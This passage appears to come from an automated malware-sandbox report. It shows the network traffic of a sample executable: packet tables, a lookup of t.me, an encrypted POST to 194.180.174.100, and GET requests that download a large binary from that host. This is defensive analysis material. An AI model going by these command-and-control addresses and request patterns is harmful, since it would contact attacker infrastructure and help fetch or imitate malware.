                                                                                                  Sep 27, 2021 20:31:45.515559912 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515584946 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515609026 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515652895 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515655994 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.515677929 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515702963 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515728951 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.515728951 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515786886 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.515849113 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515877008 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.515978098 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.516154051 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516231060 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516282082 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516305923 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516305923 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.516362906 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516366005 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.516393900 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516416073 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516472101 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516484022 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.516495943 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516519070 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516546011 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.516561985 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516602993 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516640902 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516679049 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516697884 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.516700983 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516729116 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516763926 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.516782045 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516810894 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.516937971 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.517039061 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.548394918 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.548438072 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.548501968 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.548791885 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.548819065 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.548855066 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.548897982 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.548989058 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.549011946 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.549108028 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.549150944 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.549175024 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.549196959 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.549220085 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.551395893 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.556605101 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.556655884 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.557538033 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.557543039 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.557569981 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.557594061 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.557617903 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.557796955 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566129923 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566163063 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566298008 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566324949 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566349030 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566420078 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566440105 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566462994 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566484928 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566507101 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566524029 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566545963 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566581011 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566584110 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566606045 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566626072 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566639900 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566660881 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566683054 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566695929 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566728115 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566742897 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566766977 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566797972 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566826105 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566842079 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566864967 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566889048 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566900015 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566922903 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566956997 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566957951 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.566979885 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.566998005 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.567316055 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567346096 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567368031 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567395926 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.567420959 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.567424059 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567446947 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567498922 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.567770958 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567821980 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567843914 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567861080 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567915916 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.567926884 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:45.567955017 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:45.623106003 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:47.146648884 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:47.146759033 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:47.197381020 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:47.197554111 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:47.478635073 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:47.623197079 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:50.868885994 CEST4975580192.168.2.5194.180.174.100

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Sep 27, 2021 20:31:31.719063044 CEST6180553192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:31:31.739980936 CEST53618058.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:31:39.047183990 CEST5479553192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:31:39.059566975 CEST53547958.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:31:42.317663908 CEST4955753192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:31:42.353399992 CEST53495578.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:31:59.200480938 CEST6173353192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:31:59.232600927 CEST53617338.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:32:18.317281961 CEST6544753192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:32:18.350663900 CEST53654478.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:32:35.255554914 CEST5244153192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:32:35.259861946 CEST6217653192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:32:35.287235022 CEST53524418.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:32:35.287355900 CEST53621768.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:32:37.803463936 CEST5959653192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:32:37.821343899 CEST53595968.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:33:12.765659094 CEST6529653192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:33:12.802509069 CEST53652968.8.8.8192.168.2.5
                                                                                                  Sep 27, 2021 20:33:14.077539921 CEST6318353192.168.2.58.8.8.8
                                                                                                  Sep 27, 2021 20:33:14.090922117 CEST53631838.8.8.8192.168.2.5

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Sep 27, 2021 20:31:39.047183990 CEST192.168.2.58.8.8.80xf4a7Standard query (0)t.meA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Sep 27, 2021 20:31:39.059566975 CEST8.8.8.8192.168.2.50xf4a7No error (0)t.me149.154.167.99A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • t.me
                                                                                                  • 194.180.174.100

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.549742149.154.167.99443C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.549745194.180.174.10080C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Sep 27, 2021 20:31:39.696208000 CEST664OUTPOST / HTTP/1.1
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                  Content-Length: 128
                                                                                                  Host: 194.180.174.100
                                                                                                  Sep 27, 2021 20:31:39.696279049 CEST664OUTData Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 61 6b 56 58 73 63 48 51 55 2f 54 32 74 2f 42 6f 75 35 34 67 56 79 2f 66 58 77 54 31 78 4d
                                                                                                  Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3akVXscHQU/T2t/Bou54gVy/fXwT1xMQ6oIV9g4OF5WpIMH4A+7pj7a1XPgNfHdjEXaWb0gbct84=
                                                                                                  Sep 27, 2021 20:31:40.108971119 CEST1105INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 27 Sep 2021 18:31:40 GMT
                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: keep-alive
                                                                                                  Vary: Accept-Encoding
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Data Raw: 66 33 37 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 64 38 74 4e 66 69 73 76 55 45 79 35 35 52 4d 2b 61 63 65 74 4f 7a 6b 35 35 4c 6e 51 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 5a 32 36 2b 6a 36 50 38 2b 38 77 4b 56 71 32 38 78 30 5a 6d 33 48 42 46 6e 6f 37 49 68 72 71 34 42 30 31 64 4b 42 36 47 70 4f 50 53 34 4b 71 65 67 7a 36 71 73 41 4f 56 68 66 48 34 72 46 57 4f 4c 4e 32 77 6d 64 37 35 42 62 43 76 69 67 54 65 6f 59 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 56 6b 2b 47 74 55 67 72 4f 59 79 74 4f 35 4a 4e 30 42 74 59 4f 53 37 32 6d 67 56 32 6c 6b 37 47 65 45 67 63 4e 67 65 5a 38 52 38 47 63 38 30 5a 59 4e 53 32 57 78 6c 73 34 6b 6e 30 47 6b 6f 45 6f 56 35 4d 62 31 34 62 4e 6d 50 34 6d 76 47 30 43 45 56 37 44 6e 73 73 68 55 6b 64 31 79 4b 5a 31 48 6a 49 48 56 34 50 48 79 37 38 34 48 59 71 6f 73 78 45 7a 6c 35 55 74 42 63 32 6b 33 62 35 67 61 4b 5a 30 44 49 61 71 4f 50 32 58 63 4f 64 5a 6b 6f 63 45 77 53 62 69 43 4b 38 79 62 71 36 76 45 61 79 4a 34 5a 4f 41 30 54 2b 42 6f 51 37 6e 38 6a 6a 7a 59 4a 78 42 46 4e 46 51 76 6a 61 73 73 57 58 4f 49 72 55 6b 69 39 70 7a 2b 61 38 42 41 74 79 35 41 52 2b 77 6b 33 65 57 31 33 77 30 44 59 79 31 31 6b 34 33 6a 4e 69 38 65 70 4e 36 39 52 54 5a 54 70 56 7a 49 74 74 31 55 57 55 70 75 37 57 39 65 54 7a 79 39 36 4a 47 41 59 74 30 4d 79 44 38 6c 75 49 49 49 43 54 6f 39 69 4f 65 4f 6b 39 59 35 62 6a 43 2b 68 79 49 79 64 64 44 70 62 6a 44 71 4f 33 39 37 46 7a 45 73 67 5a 65 4c 46 34 65 32 54 6f 64 6f 54 79 30 6d 49 52 76 48 63 62 69 4e 70 71 71 54 50 4c 57 54 53 4b 67 56 64 32 72 66 79 7a 74 79 50 41 34 50 39 47 35 4a 55 47 76 48 47 77 49 47 44 33 58 65 46 4a 35 52 58 33 55 7a 74 49 74 62 45 76 2b 77 35 30 69 34 32 47 33 62 47 72 48 35 34 72 35 6a 74 45 68 68 73 76 54 33 77 62 42 35 32 2b 55 72 66 78 57 73 51 66 44 34 6c 31 63 51 78 76 50 55 69 56 36 69 4d 6d 48 36 68 6c 52 4f 46 6f 71 78 4d 79 35 4d 62 35 48 37 66 41 50 70 42 48 59 49 71 61 57 49 4e 57 50 46 55 76 38 5a 6f 7a 57 58 71 41 31 47 59 6b 32 69 2b 2b 38 67 44 58 36 68 32 31 46 41 2b 38 6b 61 32 6b 42 77 31 59 64 53 4c 4e 72 70 4f 6c 55 71 6b 55 56 73 50 44 6c 41 46 69 69 74 53 2b 38 52 75 70 6a 5a 48 5a 53 72 73 74 6e 44 32 4c 7a 38 72 70 65 34 71 48 64 69 45 64 65 4d 54 38 57 42 2f 65 78 55 49 62 33 30 48 42 46 44 6a 76 68 71 53 61 64 64 57 36 75 4f 6a 4d 63 45 72 58 2f 38 30 35 33 68 71 71 65 4b 33 70 46 54 51 38 6b 79 5a 66 6e 4d 2f 63 6a 66 69 4c 78 31 4f 6a 43 35 2b 38 6f 53 78 37 53 46 2b 58 56 43 48 4f 4e 56 77 30 75 75 64 49 35 42 33 61 31 62 71 64 67 6a 59 57 76 4e 38 2f 32 4b 70 48 36 6c 41 33 36 48 4e 79 2b 50 49 74 45 54 5a 71 74 6a 2b 6f 44 59 55 38 73 63 68 75 6d 65 6e 6d 51 59 78 66 70 43 78 61 45 59 32 70 75 6e 56 31 65 45 7a 2b 57 73 6e 78 56 58 58 36 48 43 4f 31 57 33 48 31 6d 47 48 6e 43 48 4c 39 55 69 30 4a 39 71 72 32 58 6e 78 51 59 6b 46 33 71 4f 42 68 58 33 6e 4a 65 4a 48 48 41 74 64 49 49 49 75 2f 4f 69 4e 49 31 30 73 66 50 77 52 70 4c 7a 47 5a 64 67 34 72 52 30 65 78 41 4b 50 78 37 43 33 46 4e 41 62 78 35 65 2f 41 6e 38 31 54 43 6a 58 71 75 34 63 67 6b 75 4a 73 74 71 4e 55 43 43 46 6a 48 77 67 7a 50 4c 33 42 51 68 54 48 4e 4a 64 54 4e 55 51 71 4a 44 4f 4a 34 32 5a 71 63 45 6c 7a 4c 36 6a 38 73 53 37 6d 64 66 45 33 39 76 46 33 48 63 64 33 76 68 79 74 66 4e 4a 35 71 58 50 51 46 44 61 74 42 53 34 30 68 53 4c 75 79 53 52 32 32 73 37 33 75 35 38 4a 58 55 66 4b 55 66 7a 47 2b 74
                                                                                                  Data Ascii: f37unN2GK+nPmd8tNfisvUEy55RM+acetOzk55LnQ3WAOVMT0Fbn38HbQZ26+j6P8+8wKVq28x0Zm3HBFno7Ihrq4B01dKB6GpOPS4Kqegz6qsAOVhfH4rFWOLN2wmd75BbCvigTeoY4b124vbL7XayDSfkgVk+GtUgrOYytO5JN0BtYOS72mgV2lk7GeEgcNgeZ8R8Gc80ZYNS2Wxls4kn0GkoEoV5Mb14bNmP4mvG0CEV7DnsshUkd1yKZ1HjIHV4PHy784HYqosxEzl5UtBc2k3b5gaKZ0DIaqOP2XcOdZkocEwSbiCK8ybq6vEayJ4ZOA0T+BoQ7n8jjzYJxBFNFQvjassWXOIrUki9pz+a8BAty5AR+wk3eW13w0DYy11k43jNi8epN69RTZTpVzItt1UWUpu7W9eTzy96JGAYt0MyD8luIIICTo9iOeOk9Y5bjC+hyIyddDpbjDqO397FzEsgZeLF4e2TodoTy0mIRvHcbiNpqqTPLWTSKgVd2rfyztyPA4P9G5JUGvHGwIGD3XeFJ5RX3UztItbEv+w50i42G3bGrH54r5jtEhhsvT3wbB52+UrfxWsQfD4l1cQxvPUiV6iMmH6hlROFoqxMy5Mb5H7fAPpBHYIqaWINWPFUv8ZozWXqA1GYk2i++8gDX6h21FA+8ka2kBw1YdSLNrpOlUqkUVsPDlAFiitS+8RupjZHZSrstnD2Lz8rpe4qHdiEdeMT8WB/exUIb30HBFDjvhqSaddW6uOjMcErX/8053hqqeK3pFTQ8kyZfnM/cjfiLx1OjC5+8oSx7SF+XVCHONVw0uudI5B3a1bqdgjYWvN8/2KpH6lA36HNy+PItETZqtj+oDYU8schumenmQYxfpCxaEY2punV1eEz+WsnxVXX6HCO1W3H1mGHnCHL9Ui0J9qr2XnxQYkF3qOBhX3nJeJHHAtdIIIu/OiNI10sfPwRpLzGZdg4rR0exAKPx7C3FNAbx5e/An81TCjXqu4cgkuJstqNUCCFjHwgzPL3BQhTHNJdTNUQqJDOJ42ZqcElzL6j8sS7mdfE39vF3Hcd3vhytfNJ5qXPQFDatBS40hSLuySR22s73u58JXUfKUfzG+t
                                                                                                  Sep 27, 2021 20:31:40.108994961 CEST1106INData Raw: 79 34 4c 5a 75 54 68 30 51 57 4a 59 5a 63 58 4c 63 33 4c 32 76 50 6d 5a 69 7a 56 4e 75 34 70 57 36 2f 50 38 35 63 65 65 45 32 6c 37 32 4f 6c 76 76 41 36 70 58 43 45 68 57 64 64 70 52 30 5a 62 37 63 51 73 7a 58 64 7a 4e 66 37 6f 76 56 70 65 64 46
                                                                                                  Data Ascii: y4LZuTh0QWJYZcXLc3L2vPmZizVNu4pW6/P85ceeE2l72OlvvA6pXCEhWddpR0Zb7cQszXdzNf7ovVpedFPrGOCQ4MIytnD1JJFFw5VEbyMAfklq9okQ2AIGXFoaMexhI+WUFk3vc6eynUbihL/nT5eTuvF/gNGZh0xpQKan7ixIVzTF6Vkdbb7pt5tujjlP9CLfx1vTHwCT4BaIh/s9rZf+Mv5Fd3rAl32r3uiApYcHJjD4LNn
                                                                                                  Sep 27, 2021 20:31:40.109009027 CEST1107INData Raw: 37 65 4f 38 72 44 2f 4e 35 67 52 5a 32 2b 77 58 77 72 2f 44 6a 57 55 35 77 75 46 7a 64 4a 30 73 52 66 4d 31 35 65 50 74 4e 31 67 6c 67 79 35 5a 76 6e 30 65 6a 56 4c 71 37 54 37 51 6b 65 4c 30 74 47 73 47 68 71 34 67 46 76 6a 43 56 78 61 79 30 49
                                                                                                  Data Ascii: 7eO8rD/N5gRZ2+wXwr/DjWU5wuFzdJ0sRfM15ePtN1glgy5Zvn0ejVLq7T7QkeL0tGsGhq4gFvjCVxay0IbdBahbc6O95x29yRM/T87VDLnUabb7+Cl8BTvF1tLmDq07PG1MiflARsl3s1frWVh/kLYJN31ByHtEL0S0ffZmAccG1P0FL1bBpbl9FLywjoScydO4PcugqiTTkII8EO99Q00eR11xUy43kLIiPqQ1QdwrPQ3M7yb
                                                                                                  Sep 27, 2021 20:31:40.109021902 CEST1108INData Raw: 2b 45 31 37 44 56 4c 4b 45 56 74 4b 68 34 35 4c 36 57 73 4d 74 70 6f 4a 66 45 4c 69 76 4f 45 68 4c 53 53 79 2b 41 51 2b 30 6b 73 74 32 57 68 59 75 72 58 41 51 2f 49 75 41 7a 34 68 4a 4c 52 31 6f 70 50 59 78 49 30 5a 6f 52 4c 30 2f 48 39 47 4b 4a
                                                                                                  Data Ascii: +E17DVLKEVtKh45L6WsMtpoJfELivOEhLSSy+AQ+0kst2WhYurXAQ/IuAz4hJLR1opPYxI0ZoRL0/H9GKJTYHqqAFCDeBvmugYmWF/UZ
                                                                                                  Sep 27, 2021 20:31:40.109273911 CEST1109INData Raw: 37 65 31 0d 0a 78 45 61 65 70 44 4c 41 73 58 41 6d 73 41 4a 6d 67 36 35 76 31 77 67 75 33 4d 38 44 35 75 72 62 34 57 51 69 61 37 4f 79 31 50 71 34 6a 4b 2b 55 65 73 67 50 2b 37 6d 4c 42 4c 6d 35 48 36 4b 67 36 79 64 62 30 66 44 36 69 74 65 6c 63
                                                                                                  Data Ascii: 7e1xEaepDLAsXAmsAJmg65v1wgu3M8D5urb4WQia7Oy1Pq4jK+UesgP+7mLBLm5H6Kg6ydb0fD6itelcvF5nWVfBHjQPVC4pR9L6ysv8swKGjx7yiV2HHqf8K1YGIZd096vCOsR/JZlVX407EWM/mDjMUUV0nv1auCOyo15nUt0hl38NxAJ/2i/TmRQkHbIXYxylq/rU2b0PgGMuKp8eeyzGNiWlzWP0ObXhxTqhx3GG120Kp
                                                                                                  Sep 27, 2021 20:31:40.109555006 CEST1110INData Raw: 6e 74 7a 5a 31 32 33 30 77 43 39 72 58 4d 42 63 66 78 59 35 58 47 77 63 38 76 64 78 5a 36 2b 42 57 4c 77 58 30 4a 6d 70 55 50 61 50 4c 75 52 6b 6e 52 54 42 58 57 72 4d 30 4f 30 79 57 4d 6d 4d 69 7a 41 51 65 56 42 56 72 64 30 63 46 38 6b 56 6f 2b
                                                                                                  Data Ascii: ntzZ1230wC9rXMBcfxY5XGwc8vdxZ6+BWLwX0JmpUPaPLuRknRTBXWrM0O0yWMmMizAQeVBVrd0cF8kVo+lLBLFUrcYzGH6JyzwaeyKZ3zT5SoNCUeEVPtjsqLr3XAQE3Y4ChpZCtSVhfdPkzShQ68+7UiY3wcn+CmZV29nvatz4VEjgt2XTPYo9qR19lITIeszJ4Cl31EGeq/DxzeUaJi/bZluc8Q3L99Q01Z48iIhAjG4UDW+
                                                                                                  Sep 27, 2021 20:31:40.119069099 CEST1110OUTGET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Pragma: no-cache
                                                                                                  Host: 194.180.174.100


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.549755194.180.174.10080C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Sep 27, 2021 20:31:43.715740919 CEST1119OUTGET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: Keep-Alive
                                                                                                  Pragma: no-cache
                                                                                                  Host: 194.180.174.100
                                                                                                  Sep 27, 2021 20:31:43.977533102 CEST1120INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 27 Sep 2021 18:31:43 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 2828315
                                                                                                  Connection: keep-alive
                                                                                                  Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
                                                                                                  ETag: "612fa893-2b281b"
                                                                                                  Accept-Ranges: bytes
